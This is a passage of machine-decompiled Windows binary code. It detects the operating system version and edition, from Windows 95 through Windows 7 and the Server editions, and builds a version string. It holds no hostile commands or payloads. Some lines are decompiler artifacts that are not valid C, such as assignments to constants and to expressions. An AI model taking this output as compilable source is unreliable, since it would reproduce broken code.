																		__esp = __esp + 8;
																		asm("repne scasb");
																		__ecx =  !__ecx;
																		__edi = __edi - __ecx;
																		__edx = __esp + 0x74;
																		__esi = __edi;
																		__ebx = __ecx;
																		__edi = __edx;
																		__ecx = __ecx | 0xffffffff;
																		asm("repne scasb");
																		__ecx = __ebx;
																		__edi = __edx - 1;
																		__ecx = __ebx >> 2;
																		__eax = memcpy(__edx - 1, __esi, __ecx << 2);
																		__edi = __esi + __ecx;
																		__edi = __esi + __ecx + __ecx;
																		0 = __ebx;
																		__ecx = __ebx & 0x00000003;
																		__eflags = __ecx;
																		__eax = memcpy(__edi, __esi, __ecx);
																		__esi + __ecx = __esi + __ecx + __ecx;
																		__ecx = 0;
																	}
																	__eax = __esp + 0x27c;
																	__ecx = __esp + 0x10;
																	_push(__esp + 0x27c);
																	__eax = E0046E740();
																	__eflags = __eax;
																	if(__eax != 0) {
																		L152:
																		_push(" BackOffice Small Business Edition");
																		L153:
																		__ecx = __esp + 0x1c;
																		_push(__esp + 0x1c);
																		__eax = E0047262F(__edx);
																		__edi = __esp + 0x20;
																		__ecx = __ecx | 0xffffffff;
																		__eax = 0;
																		__esp = __esp + 8;
																		asm("repne scasb");
																		__ecx =  !__ecx;
																		__edi = __edi - __ecx;
																		__edx = __esp + 0x74;
																		__esi = __edi;
																		__ebx = __ecx;
																		__edi = __edx;
																		__ecx = __ecx | 0xffffffff;
																		asm("repne scasb");
																		__ecx = __ebx;
																		__edi = __edx - 1;
																		__ecx = __ebx >> 2;
																		__eax = memcpy(__edx - 1, __esi, __ecx << 2);
																		__edi = __esi + __ecx;
																		__edi = __esi + __ecx + __ecx;
																		0 = __ebx;
																		__ecx = __ebx & 0x00000003;
																		__eflags = __ecx;
																		__eax = memcpy(__edi, __esi, __ecx);
																		__esi + __ecx = __esi + __ecx + __ecx;
																		__ecx = 0;
																	}
																	goto L154;
																}
																_push(" Advanced Server");
																L148:
																__ecx = __esp + 0x1c;
																_push(__esp + 0x1c);
																__eax = E0047262F(__edx);
																__edi = __esp + 0x20;
																__ecx = __ecx | 0xffffffff;
																__eax = 0;
																__esp = __esp + 8;
																asm("repne scasb");
																__ecx =  !__ecx;
																__edi = __edi - __ecx;
																__edx = __esp + 0x74;
																__esi = __edi;
																__ebx = __ecx;
																__edi = __edx;
																__ecx = __ecx | 0xffffffff;
																asm("repne scasb");
																__ecx = __ebx;
																__edi = __edx - 1;
																__ecx = __ebx >> 2;
																__eax = memcpy(__edx - 1, __esi, __ecx << 2);
																__edi = __esi + __ecx;
																__edi = __esi + __ecx + __ecx;
																0 = __ebx;
																__ecx = __ebx & 0x00000003;
																__eflags = __ecx;
																__eax = memcpy(__edi, __esi, __ecx);
																__esi + __ecx = __esi + __ecx + __ecx;
																__ecx = 0;
																goto L149;
															}
															_push(" Datacenter");
															goto L148;
														}
														_push(" Domain Controller");
														L143:
														__ecx = __esp + 0x1c;
														_push(__esp + 0x1c);
														__eax = E0047262F(__edx);
														__edi = __esp + 0x20;
														__ecx = __ecx | 0xffffffff;
														__eax = 0;
														__esp = __esp + 8;
														asm("repne scasb");
														__ecx =  !__ecx;
														__edi = __edi - __ecx;
														__edx = __esp + 0x74;
														__esi = __edi;
														__ebx = __ecx;
														__edi = __edx;
														__ecx = __ecx | 0xffffffff;
														asm("repne scasb");
														__ecx = __ebx;
														__edi = __edx - 1;
														__ecx = __ebx >> 2;
														__eax = memcpy(__edx - 1, __esi, __ecx << 2);
														__edi = __esi + __ecx;
														__edi = __esi + __ecx + __ecx;
														0 = __ebx;
														__ecx = __ebx & 0x00000003;
														__eflags = __ecx;
														__eax = memcpy(__edi, __esi, __ecx);
														__esi + __ecx = __esi + __ecx + __ecx;
														__ecx = 0;
														goto L144;
													}
													_push(" Server");
													goto L143;
												}
												_push(" Professional");
												goto L143;
											}
											_push(" Personal");
											goto L143;
										}
										__ecx = __esp + 0x18;
										_push("Windows XP");
										_push(__ecx);
										__eax = E0047262F(__edx);
										__edi = __esp + 0x20;
										__ecx = __ecx | 0xffffffff;
										__eax = 0;
										__esp = __esp + 8;
										asm("repne scasb");
										__ecx =  !__ecx;
										__edi = __edi - __ecx;
										__edx = __esp + 0x74;
										__esi = __edi;
										__ebx = __ecx;
										__edi = __edx;
										__ecx = __ecx | 0xffffffff;
										asm("repne scasb");
										__ecx = __ebx;
										__edi = __edx - 1;
										__ecx = __ebx >> 2;
										__eax = memcpy(__edx - 1, __esi, __ecx << 2);
										__edi = __esi + __ecx;
										__edi = __esi + __ecx + __ecx;
										0 = __ebx;
										__eax = __esp + 0x27c;
										__ecx = __ebx & 0x00000003;
										__eax = memcpy(__edi, __esi, __ecx);
										__esi + __ecx = __esi + __ecx + __ecx;
										__ecx = 0;
										__ecx = __esp + 0x14;
										__eflags = E0046E970(__esp + 0x14, __eflags, __esp + 0x27c);
										if(__eflags == 0) {
											__eax = __esp + 0x27c;
											__ecx = __esp + 0x10;
											__eflags = E0046E9A0(__esp + 0x10, __eflags, __esp + 0x27c);
											if(__eflags == 0) {
												__eax = __esp + 0x27c;
												__ecx = __esp + 0x10;
												__eflags = E0046E9F0(__esp + 0x10, __eflags, __esp + 0x27c);
												if(__eflags == 0) {
													__eax = __esp + 0x27c;
													__ecx = __esp + 0x10;
													__eflags = E0046EAA0(__esp + 0x10, __eflags, __esp + 0x27c);
													if(__eflags == 0) {
														L125:
														__eax = __esp + 0x27c;
														__ecx = __esp + 0x10;
														__eflags = E0046EA70(__esp + 0x10, __eflags, __esp + 0x27c);
														if(__eflags == 0) {
															__eax = __esp + 0x27c;
															__ecx = __esp + 0x10;
															__eax = E0046EA40(__esp + 0x10, __eflags, __esp + 0x27c);
															__eflags = __eax;
															if(__eax == 0) {
																L130:
																__eax = __esp + 0x27c;
																__ecx = __esp + 0x10;
																_push(__esp + 0x27c);
																__eax = E0046E730();
																__eflags = __eax;
																if(__eax == 0) {
																	L132:
																	__eax = __esp + 0x27c;
																	__ecx = __esp + 0x10;
																	_push(__esp + 0x27c);
																	__eax = E0046E740();
																	__eflags = __eax;
																	if(__eax == 0) {
																		goto L154;
																	}
																	goto L152;
																}
																L131:
																__ecx = __esp + 0x18;
																_push(" Terminal Services");
																_push(__ecx);
																__eax = E0047262F(__edx);
																__edi = __esp + 0x20;
																__ecx = __ecx | 0xffffffff;
																__eax = 0;
																__esp = __esp + 8;
																asm("repne scasb");
																__ecx =  !__ecx;
																__edi = __edi - __ecx;
																__edx = __esp + 0x74;
																__esi = __edi;
																__ebx = __ecx;
																__edi = __edx;
																__ecx = __ecx | 0xffffffff;
																asm("repne scasb");
																__ecx = __ebx;
																__edi = __edx - 1;
																__ecx = __ebx >> 2;
																__eax = memcpy(__edx - 1, __esi, __ecx << 2);
																__edi = __esi + __ecx;
																__edi = __esi + __ecx + __ecx;
																0 = __ebx;
																__ecx = __ebx & 0x00000003;
																__eflags = __ecx;
																__eax = memcpy(__edi, __esi, __ecx);
																__esi + __ecx = __esi + __ecx + __ecx;
																__ecx = 0;
																goto L132;
															}
															_push(" Advanced Server");
															L129:
															__ecx = __esp + 0x1c;
															_push(__esp + 0x1c);
															__eax = E0047262F(__edx);
															__edi = __esp + 0x20;
															__ecx = __ecx | 0xffffffff;
															__eax = 0;
															__esp = __esp + 8;
															asm("repne scasb");
															__ecx =  !__ecx;
															__edi = __edi - __ecx;
															__edx = __esp + 0x74;
															__esi = __edi;
															__ebx = __ecx;
															__edi = __edx;
															__ecx = __ecx | 0xffffffff;
															asm("repne scasb");
															__ecx = __ebx;
															__edi = __edx - 1;
															__ecx = __ebx >> 2;
															__eax = memcpy(__edx - 1, __esi, __ecx << 2);
															__edi = __esi + __ecx;
															__edi = __esi + __ecx + __ecx;
															0 = __ebx;
															__ecx = __ebx & 0x00000003;
															__eflags = __ecx;
															__eax = memcpy(__edi, __esi, __ecx);
															__esi + __ecx = __esi + __ecx + __ecx;
															__ecx = 0;
															goto L130;
														}
														_push(" Datacenter");
														goto L129;
													}
													_push(" Domain Controller");
													L124:
													__ecx = __esp + 0x1c;
													_push(__esp + 0x1c);
													__eax = E0047262F(__edx);
													__edi = __esp + 0x20;
													__ecx = __ecx | 0xffffffff;
													__eax = 0;
													__esp = __esp + 8;
													asm("repne scasb");
													__ecx =  !__ecx;
													__edi = __edi - __ecx;
													__edx = __esp + 0x74;
													__esi = __edi;
													__ebx = __ecx;
													__edi = __edx;
													__ecx = __ecx | 0xffffffff;
													asm("repne scasb");
													__ecx = __ebx;
													__edi = __edx - 1;
													__ecx = __ebx >> 2;
													__eax = memcpy(__edx - 1, __esi, __ecx << 2);
													__edi = __esi + __ecx;
													__edi = __esi + __ecx + __ecx;
													0 = __ebx;
													__ecx = __ebx & 0x00000003;
													__eflags = __ecx;
													__eax = memcpy(__edi, __esi, __ecx);
													__esi + __ecx = __esi + __ecx + __ecx;
													__ecx = 0;
													goto L125;
												}
												_push(" Server");
												goto L124;
											}
											_push(" Professional");
											goto L124;
										}
										_push(" Personal");
										goto L124;
									}
									__ecx = __esp + 0x18;
									_push("Windows 2000");
									_push(__ecx);
									__eax = E0047262F(__edx);
									__edi = __esp + 0x20;
									__ecx = __ecx | 0xffffffff;
									__eax = 0;
									__esp = __esp + 8;
									asm("repne scasb");
									__ecx =  !__ecx;
									__edi = __edi - __ecx;
									__edx = __esp + 0x74;
									__esi = __edi;
									__ebx = __ecx;
									__edi = __esp + 0x74;
									__ecx = __ecx | 0xffffffff;
									asm("repne scasb");
									__ecx = __ebx;
									__edi = __esp + 0x74 - 1;
									__ecx = __ebx >> 2;
									__eax = memcpy(__esp + 0x74 - 1, __esi, __ecx << 2);
									__edi = __esi + __ecx;
									__edi = __esi + __ecx + __ecx;
									0 = __ebx;
									__eax = __esp + 0x27c;
									__ecx = __ebx & 0x00000003;
									__eax = memcpy(__edi, __esi, __ecx);
									__esi + __ecx = __esi + __ecx + __ecx;
									__ecx = 0;
									__ecx = __esp + 0x14;
									__eflags = E0046E820(__esp + 0x14, __eflags, __esp + 0x27c);
									if(__eflags == 0) {
										__eax = __esp + 0x27c;
										__ecx = __esp + 0x10;
										__eflags = E0046E870(__esp + 0x10, __eflags, __esp + 0x27c);
										if(__eflags == 0) {
											__eax = __esp + 0x27c;
											__ecx = __esp + 0x10;
											__eflags = E0046E920(__esp + 0x10, __eflags, __esp + 0x27c);
											if(__eflags == 0) {
												L108:
												__eax = __esp + 0x27c;
												__ecx = __esp + 0x10;
												__eflags = E0046E8F0(__esp + 0x10, __eflags, __esp + 0x27c);
												if(__eflags == 0) {
													__eax = __esp + 0x27c;
													__ecx = __esp + 0x10;
													__eax = E0046E8C0(__esp + 0x10, __eflags, __esp + 0x27c);
													__eflags = __eax;
													if(__eax == 0) {
														L113:
														__eax = __esp + 0x27c;
														__ecx = __esp + 0x10;
														_push(__esp + 0x27c);
														__eax = E0046E730();
														__eflags = __eax;
														if(__eax == 0) {
															goto L132;
														}
														goto L131;
													}
													_push(" Advanced Server");
													L112:
													__ecx = __esp + 0x1c;
													_push(__esp + 0x1c);
													__eax = E0047262F(__edx);
													__edi = __esp + 0x20;
													__ecx = __ecx | 0xffffffff;
													__eax = 0;
													__esp = __esp + 8;
													asm("repne scasb");
													__ecx =  !__ecx;
													__edi = __edi - __ecx;
													__edx = __esp + 0x74;
													__esi = __edi;
													__ebx = __ecx;
													__edi = __edx;
													__ecx = __ecx | 0xffffffff;
													asm("repne scasb");
													__ecx = __ebx;
													__edi = __edx - 1;
													__ecx = __ebx >> 2;
													__eax = memcpy(__edx - 1, __esi, __ecx << 2);
													__edi = __esi + __ecx;
													__edi = __esi + __ecx + __ecx;
													0 = __ebx;
													__ecx = __ebx & 0x00000003;
													__eflags = __ecx;
													__eax = memcpy(__edi, __esi, __ecx);
													__esi + __ecx = __esi + __ecx + __ecx;
													__ecx = 0;
													goto L113;
												}
												_push(" Datacenter");
												goto L112;
											}
											_push(" Domain Controller");
											L107:
											__ecx = __esp + 0x1c;
											_push(__esp + 0x1c);
											__eax = E0047262F(__edx);
											__edi = __esp + 0x20;
											__ecx = __ecx | 0xffffffff;
											__eax = 0;
											__esp = __esp + 8;
											asm("repne scasb");
											__ecx =  !__ecx;
											__edi = __edi - __ecx;
											__edx = __esp + 0x74;
											__esi = __edi;
											__ebx = __ecx;
											__edi = __edx;
											__ecx = __ecx | 0xffffffff;
											asm("repne scasb");
											__ecx = __ebx;
											__edi = __edx - 1;
											__ecx = __ebx >> 2;
											__eax = memcpy(__edx - 1, __esi, __ecx << 2);
											__edi = __esi + __ecx;
											__edi = __esi + __ecx + __ecx;
											0 = __ebx;
											__ecx = __ebx & 0x00000003;
											__eflags = __ecx;
											__eax = memcpy(__edi, __esi, __ecx);
											__esi + __ecx = __esi + __ecx + __ecx;
											__ecx = 0;
											goto L108;
										}
										_push(" Server");
										goto L107;
									}
									_push(" Professional");
									goto L107;
								}
								__edx = __esp + 0x18;
								_push("Windows NT");
								_push(__edx);
								__eax = E0047262F(__edx);
								__edi = __esp + 0x20;
								__ecx = __ecx | 0xffffffff;
								__eax = 0;
								__esp = __esp + 8;
								asm("repne scasb");
								__ecx =  !__ecx;
								__edi = __edi - __ecx;
								__edx = __esp + 0x74;
								__esi = __edi;
								__ebx = __ecx;
								__edi = __esp + 0x74;
								__ecx = __ecx | 0xffffffff;
								asm("repne scasb");
								__ecx = __ebx;
								__edi = __esp + 0x74 - 1;
								__ecx = __ebx >> 2;
								__eax = memcpy(__esp + 0x74 - 1, __esi, __ecx << 2);
								__edi = __esi + __ecx;
								__edi = __esi + __ecx + __ecx;
								0 = __ebx;
								__eax = __esp + 0x27c;
								__ecx = __ebx & 0x00000003;
								__eax = memcpy(__edi, __esi, __ecx);
								__esi + __ecx = __esi + __ecx + __ecx;
								__ecx = 0;
								__ecx = __esp + 0x14;
								__eflags = E0046E750(__esp + 0x14, __eflags, __esp + 0x27c);
								if(__eflags == 0) {
									__eax = __esp + 0x27c;
									__ecx = __esp + 0x10;
									__eflags = E0046E690(__esp + 0x10, __eflags, __esp + 0x27c);
									if(__eflags == 0) {
										__eax = __esp + 0x27c;
										__ecx = __esp + 0x10;
										__eflags = E0046E640(__esp + 0x10, __eflags, __esp + 0x27c);
										if(__eflags == 0) {
											__eax = __esp + 0x27c;
											__ecx = __esp + 0x10;
											__eflags = E0046E6E0(__esp + 0x10, __eflags, __esp + 0x27c);
											if(__eflags == 0) {
												L96:
												__eax = __esp + 0x27c;
												__ecx = __esp + 0x10;
												__eflags = E0046E7D0(__esp + 0x10, __eflags, __esp + 0x27c);
												if(__eflags == 0) {
													__eax = __esp + 0x27c;
													__ecx = __esp + 0x10;
													__eax = E0046E7A0(__ecx, __eflags, __esp + 0x27c);
													__eflags = __eax;
													if(__eax == 0) {
														goto L154;
													}
													_push(" Enterprise");
													goto L153;
												}
												_push(" Datacenter");
												goto L153;
											}
											_push(" Backup Domain Controller");
											L95:
											__ecx = __esp + 0x1c;
											_push(__esp + 0x1c);
											__eax = E0047262F(__edx);
											__edi = __esp + 0x20;
											__ecx = __ecx | 0xffffffff;
											__eax = 0;
											__esp = __esp + 8;
											asm("repne scasb");
											__ecx =  !__ecx;
											__edi = __edi - __ecx;
											__edx = __esp + 0x74;
											__esi = __edi;
											__ebx = __ecx;
											__edi = __esp + 0x74;
											__ecx = __ecx | 0xffffffff;
											asm("repne scasb");
											__ecx = __ebx;
											__edi = __esp + 0x74 - 1;
											__ecx = __ebx >> 2;
											__eax = memcpy(__esp + 0x74 - 1, __esi, __ecx << 2);
											__edi = __esi + __ecx;
											__edi = __esi + __ecx + __ecx;
											0 = __ebx;
											__ecx = __ebx & 0x00000003;
											__eflags = __ecx;
											__eax = memcpy(__edi, __esi, __ecx);
											__esi + __ecx = __esi + __ecx + __ecx;
											__ecx = 0;
											goto L96;
										}
										_push(" Primary Domain Controller");
										goto L95;
									}
									_push(" Server");
									goto L95;
								}
								_push(" Workstation");
								goto L95;
							case 4:
								__ecx = __esp + 0x18;
								_push("Windows CE");
								_push(__ecx);
								L85:
								E0047262F(_t736);
								_t868 = _t854 + 8;
								asm("repne scasb");
								_t665 =  !(_t663 | 0xffffffff);
								_t833 = _t854 + 0x20 - _t665;
								_t589 = _t665;
								asm("repne scasb");
								_t668 = _t589 >> 2;
								memcpy(_t868 + 0x74 - 1, _t833, _t668 << 2);
								_t450 = memcpy(_t833 + _t668 + _t668, _t833, _t589 & 0x00000003);
								_t858 = _t868 + 0x18;
								goto L158;
						}
					}
					_t481 = _t430 - 1;
					if(_t481 == 0) {
						__eflags =  *((intOrPtr*)(_t851 + 0x1e4)) - 4;
						if( *((intOrPtr*)(_t851 + 0x1e4)) != 4) {
							goto L63;
						}
						__eflags =  *(_t851 + 0x1e8);
						if( *(_t851 + 0x1e8) != 0) {
							L56:
							__eflags =  *(_t851 + 0x1e8) - 0xa;
							if( *(_t851 + 0x1e8) != 0xa) {
								L60:
								__eflags =  *(_t851 + 0x1e8) - 0x5a;
								if( *(_t851 + 0x1e8) == 0x5a) {
									E00483652(_t847 + 8, "Microsoft Windows Me ");
									 *(_t847 + 4) = 2;
								}
								goto L63;
							}
							_t834 = _t847 + 8;
							E00483652(_t847 + 8, "Microsoft Windows 98 ");
							__eflags =  *((char*)(_t851 + 0x1f5)) - 0x41;
							if( *((char*)(_t851 + 0x1f5)) == 0x41) {
								E00483652(_t834, "SE ");
							}
							 *(_t847 + 4) = 1;
							__eflags =  *((intOrPtr*)(_t851 + 0x1e4)) - 4;
							if( *((intOrPtr*)(_t851 + 0x1e4)) != 4) {
								goto L63;
							} else {
								goto L60;
							}
						}
						_t835 = _t847 + 8;
						E00483652(_t847 + 8, "Microsoft Windows 95 ");
						_t487 =  *((intOrPtr*)(_t851 + 0x1f5));
						__eflags = _t487 - 0x43;
						if(_t487 != 0x43) {
							E00483679(_t835, _t487);
							_push(" ");
						} else {
							_push("OSR2 ");
						}
						E00483652(_t835);
						 *(_t847 + 4) = 0;
						__eflags =  *((intOrPtr*)(_t851 + 0x1e4)) - 4;
						if( *((intOrPtr*)(_t851 + 0x1e4)) != 4) {
							goto L63;
						} else {
							goto L56;
						}
					}
					if(_t481 != 1) {
						goto L63;
					} else {
						if( *((intOrPtr*)(_t851 + 0x1e4)) <= 4) {
							E00483652(_t847 + 8, "Microsoft Windows NT ");
						}
						if( *((intOrPtr*)(_t851 + 0x1e4)) != 5) {
							L14:
							if( *((intOrPtr*)(_t851 + 0x1e4)) != 6) {
								L23:
								if( *((intOrPtr*)(_t851 + 0x1e4)) > 4) {
									L37:
									 *((intOrPtr*)(_t851 + 0xd8)) = 0x49b54c;
									 *((intOrPtr*)(_t851 + 0x14c)) = 0;
									 *((intOrPtr*)(_t851 + 0x128)) = 0x49b548;
									 *(_t851 + 0x6c) = 4;
									_t746 =  *0x49b550; // 0x50
									 *(_t851 + 0x3ac) = 7;
									 *((intOrPtr*)(_t851 + _t746 + 0xd8)) = 0x49b544;
									_t119 =  *((intOrPtr*)(_t851 + 0xd8)) + 4; // 0x46da90
									_t679 =  *_t119;
									 *((intOrPtr*)(_t851 + _t679 + 0x100)) = _t851 + 0xdc;
									 *((intOrPtr*)(_t851 + _t679 + 0x104)) = 0;
									 *((char*)(_t851 + _t679 + 0x108)) = 0x20;
									_t837 = _t851 + _t679 + 0xd8;
									_t680 = _t837;
									E00480102(_t837);
									__eflags =  *(_t837 + 0x28);
									if( *(_t837 + 0x28) == 0) {
										_t129 = _t837 + 4; // 0x46da90
										_push(0);
										_t680 = _t837;
										_t529 =  *_t129 | 4;
										__eflags = _t529;
										_push(_t529);
										E0047FDAB(_t837);
									}
									 *(_t851 + 0x3ac) = 9;
									 *((intOrPtr*)(_t851 + 0x70)) = _t851 + 0xdc;
									 *(_t851 + 0x110) = E0048062D(_t680);
									E004804CA(_t851 + 0x14);
									_t838 =  *0x4e1bb4; // 0x4d01788
									E004804CA(_t851 + 0x68);
									_t136 = _t838 + 4; // 0x2
									_t499 =  *_t136;
									__eflags = _t499 - 0xffffffff;
									if(_t499 < 0xffffffff) {
										_t526 = _t499 + 1;
										__eflags = _t526;
										 *(_t838 + 4) = _t526;
									}
									E00480566();
									E00480566();
									 *((intOrPtr*)(_t851 + 0xe8)) = _t851 + 0xe0;
									 *((intOrPtr*)(_t851 + 0xec)) = _t851 + 0xe4;
									 *((intOrPtr*)(_t851 + 0xf8)) = _t851 + 0xf0;
									 *((intOrPtr*)(_t851 + 0x100)) = _t851 + 0xf4;
									 *((char*)(_t851 + 0x3b8)) = 0xa;
									 *((intOrPtr*)(_t851 + 0xe8)) = 0x49b510;
									 *((intOrPtr*)(_t851 + 0x114)) = _t851 + 0x104;
									 *((intOrPtr*)(_t851 + 0x118)) = _t851 + 0x108;
									 *((intOrPtr*)(_t851 + 0xf0)) = 0;
									 *((intOrPtr*)(_t851 + 0x100)) = 0;
									 *(_t851 + 0x110) = 0;
									E0046ADE0(_t851 + 0xe8, 0, 0, 0);
									 *((intOrPtr*)(_t851 + 0xdc)) = 0x49b4dc;
									 *((intOrPtr*)(_t851 + 0x114)) = 0;
									 *((intOrPtr*)(_t851 + 0x118)) = 0;
									 *((intOrPtr*)(_t851 + 0x11c)) = 0x20;
									 *(_t851 + 0x120) = 4;
									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xe8)))) = 0;
									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xf8)))) = 0;
									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0x108)))) = 0;
									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xec)))) = 0;
									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xfc)))) = 0;
									 *((intOrPtr*)( *((intOrPtr*)(_t851 + 0x10c)))) = 0;
									_t170 =  *((intOrPtr*)(_t851 + 0xd8)) + 4; // 0x46da90
									 *((intOrPtr*)(_t851 +  *_t170 + 0xd8)) = 0x49b4d8;
									 *(_t851 + 0x3c0) = 0xc;
									_t512 = E0046AFC0(_t510, E0046A2B0(0, E0046AFC0(_t851 + 0x1f8, E0046AFC0(_t851 + 0x1f8, _t851 + 0xe4, _t851 + 0x1f8), " (Build "), 0x49b4dc, 0x49b4d8, __eflags,  *(_t851 + 0x1ec) & 0x0000ffff), ")");
									_t851 = _t851 + 0x18;
									E0046A5B0(_t512, __eflags, 0);
									 *((intOrPtr*)(_t851 + 0x70)) = _t851 + 0x128;
									 *((intOrPtr*)(_t851 +  *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xd8)) + 4)) + 0xd8)) = 0x49b4d8;
									 *(_t851 + 0x3ac) = 0xd;
									_t515 =  *(_t851 + 0x120);
									 *((intOrPtr*)(_t851 + 0xdc)) = 0x49b4dc;
									__eflags = _t515 & 0x00000001;
									if((_t515 & 0x00000001) != 0) {
										E0048302C( *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xe8)))));
										_t851 = _t851 + 4;
									}
									_t823 =  *(_t851 + 0x110);
									__eflags = _t823;
									 *((intOrPtr*)(_t851 + 0x118)) = 0;
									 *(_t851 + 0x120) =  *(_t851 + 0x120) & 0xfffffffe;
									 *((intOrPtr*)(_t851 + 0xdc)) = 0x49b510;
									if(_t823 != 0) {
										E004804CA(_t851 + 0x14);
										_t519 =  *(_t823 + 4);
										__eflags = _t519;
										if(_t519 > 0) {
											__eflags = _t519 - 0xffffffff;
											if(_t519 < 0xffffffff) {
												_t522 = _t519 - 1;
												__eflags = _t522;
												 *(_t823 + 4) = _t522;
											}
										}
										asm("sbb esi, esi");
										_t843 =  !( ~( *(_t823 + 4))) & _t823;
										E00480566();
										__eflags = _t843;
										if(_t843 != 0) {
											 *((intOrPtr*)( *_t843))(1);
										}
									}
									 *(_t851 + 0x3ac) = 0xffffffff;
									 *((intOrPtr*)(_t851 +  *((intOrPtr*)( *((intOrPtr*)(_t851 + 0xd8)) + 4)) + 0xd8)) = 0x49b544;
									 *((intOrPtr*)(_t851 + 0x128)) = 0x49b548;
									E00480090(_t851 + 0x128);
								} else {
									 *((intOrPtr*)(_t851 + 0x15c)) = 0x49b54c;
									 *((intOrPtr*)(_t851 + 0x1d0)) = 0;
									 *((intOrPtr*)(_t851 + 0x1ac)) = 0x49b548;
									 *(_t851 + 0x6c) = 1;
									_t756 =  *0x49b550; // 0x50
									 *(_t851 + 0x3ac) = 0;
									 *((intOrPtr*)(_t851 + _t756 + 0x15c)) = 0x49b544;
									_t49 =  *((intOrPtr*)(_t851 + 0x15c)) + 4; // 0x46da90
									_t702 =  *_t49;
									 *((intOrPtr*)(_t851 + _t702 + 0x184)) = _t851 + 0x160;
									 *((intOrPtr*)(_t851 + _t702 + 0x188)) = 0;
									 *((char*)(_t851 + _t702 + 0x18c)) = 0x20;
									_t844 = _t851 + _t702 + 0x15c;
									_t703 = _t844;
									E00480102(_t844);
									if( *((intOrPtr*)(_t844 + 0x28)) == 0) {
										_t59 = _t844 + 4; // 0x46da90
										_push(0);
										_t703 = _t844;
										_t564 =  *_t59 | 4;
										_t894 = _t564;
										_push(_t564);
										E0047FDAB(_t844);
									}
									 *(_t851 + 0x3ac) = 2;
									 *((intOrPtr*)(_t851 + 0x14)) = _t851 + 0x160;
									 *((intOrPtr*)(_t851 + 0x194)) = E0048062D(_t703);
									E004804CA(_t851 + 0x68);
									E0046A1F0();
									E00480566();
									 *(_t851 + 0x3ac) = 3;
									 *((intOrPtr*)(_t851 + 0x160)) = 0x49b510;
									E0046AF60(_t851 + 0x160);
									 *((char*)(_t851 + 0x3b8)) = 4;
									 *((intOrPtr*)(_t851 + 0x16c)) = 0x49b4dc;
									E0046AE80(_t851 + 0x16c, 0, 0, 4);
									_t73 =  *((intOrPtr*)(_t851 + 0x15c)) + 4; // 0x46da90
									 *((intOrPtr*)(_t851 +  *_t73 + 0x15c)) = 0x49b4d8;
									 *(_t851 + 0x3d4) = 5;
									_t551 = E0046AFC0(_t549, E0046A2B0(0, E0046AFC0(_t545, E0046AFC0(_t545, E0046AFC0(_t545, E0046A2B0(0, E0046AFC0(_t543, E0046A2B0(0, E0046AFC0(_t851 + 0x17c, _t851 + 0x17c, "version "), 0x49b4dc, 0x49b4d8, _t894,  *(_t851 + 0x1ec)), "."), 0x49b4dc, 0x49b4d8, _t894,  *(_t851 + 0x1e8)), " "), _t851 + 0x1fc), " (Build "), 0x49b4dc, 0x49b4d8, _t894,  *(_t851 + 0x1ec) & 0x0000ffff), ") ");
									_t851 = _t851 + 0x30;
									E0046A5B0(_t551, _t894, 0);
									_t553 =  *((intOrPtr*)(_t851 + 0x1e4));
									if(_t553 != 4) {
										__eflags = _t553 - 3;
										if(_t553 == 3) {
											__eflags =  *(_t851 + 0x1e8) - 0x33;
											if( *(_t851 + 0x1e8) == 0x33) {
												 *(_t847 + 4) = 4;
											}
										}
									} else {
										 *(_t847 + 4) = 5;
									}
									 *((intOrPtr*)(_t851 + 0x14)) = _t851 + 0x1ac;
									 *((intOrPtr*)(_t851 +  *((intOrPtr*)( *((intOrPtr*)(_t851 + 0x15c)) + 4)) + 0x15c)) = 0x49b4d8;
									 *(_t851 + 0x3ac) = 6;
									 *((intOrPtr*)(_t851 + 0x160)) = 0x49b4dc;
									if(( *(_t851 + 0x1a4) & 0x00000001) != 0) {
										E0048302C( *((intOrPtr*)( *((intOrPtr*)(_t851 + 0x16c)))));
										_t851 = _t851 + 4;
									}
									 *((intOrPtr*)(_t851 + 0x19c)) = 0;
									 *((intOrPtr*)(_t851 + 0x160)) = 0x49b510;
									 *(_t851 + 0x1a4) =  *(_t851 + 0x1a4) & 0xfffffffe;
									if( *((intOrPtr*)(_t851 + 0x194)) != 0) {
										_t558 = E0046A220();
										if(_t558 != 0) {
											 *((intOrPtr*)( *_t558))(1);
										}
									}
									 *(_t851 + 0x3ac) = 0xffffffff;
									 *((intOrPtr*)(_t851 +  *((intOrPtr*)( *((intOrPtr*)(_t851 + 0x15c)) + 4)) + 0x15c)) = 0x49b544;
									 *((intOrPtr*)(_t851 + 0x1ac)) = 0x49b548;
									E00480090(_t851 + 0x1ac);
								}
								goto L63;
							}
							_t566 =  *(_t851 + 0x1e8);
							if(_t566 != 0) {
								__eflags = _t566 - 1;
								if(_t566 != 1) {
									goto L37;
								} else {
									__eflags =  *((char*)(_t851 + 0x27a)) - 1;
									if( *((char*)(_t851 + 0x27a)) != 1) {
										E00483652(_t847 + 8, "Windows Server 2008 R2");
										E004833FF(_t847 + 0x10, "Windows Server 2008 R2");
										 *(_t847 + 4) = 0xb;
									} else {
										E00483652(_t847 + 8, "Windows 7");
										E004833FF(_t847 + 0x10, "Windows 7");
										 *(_t847 + 4) = 0xc;
									}
									goto L23;
								}
							} else {
								if( *((char*)(_t851 + 0x27a)) != 1) {
									E00483652(_t847 + 8, "Windows Server 2008");
									E004833FF(_t847 + 0x10, "Windows Server 2008");
									 *(_t847 + 4) = 0xa;
								} else {
									E00483652(_t847 + 8, "Windows Vista");
									E004833FF(_t847 + 0x10, "Windows Vista");
									 *(_t847 + 4) = 9;
								}
								goto L23;
							}
						}
						if( *(_t851 + 0x1e8) != 0) {
							L10:
							if( *(_t851 + 0x1e8) != 1) {
								L12:
								if( *(_t851 + 0x1e8) != 2) {
									goto L37;
								} else {
									E00483652(_t847 + 8, "Microsoft Windows 2003 ");
									 *(_t847 + 4) = 8;
									goto L14;
								}
							}
							E00483652(_t847 + 8, "Microsoft Windows XP ");
							 *(_t847 + 4) = 7;
							if( *((intOrPtr*)(_t851 + 0x1e4)) != 5) {
								goto L14;
							}
							goto L12;
						}
						E00483652(_t847 + 8, "Microsoft Windows 2000 ");
						 *(_t847 + 4) = 6;
						if( *((intOrPtr*)(_t851 + 0x1e4)) != 5) {
							goto L14;
						}
						goto L10;
					}
				}
				 *(_t851 + 0x1e0) = 0x94;
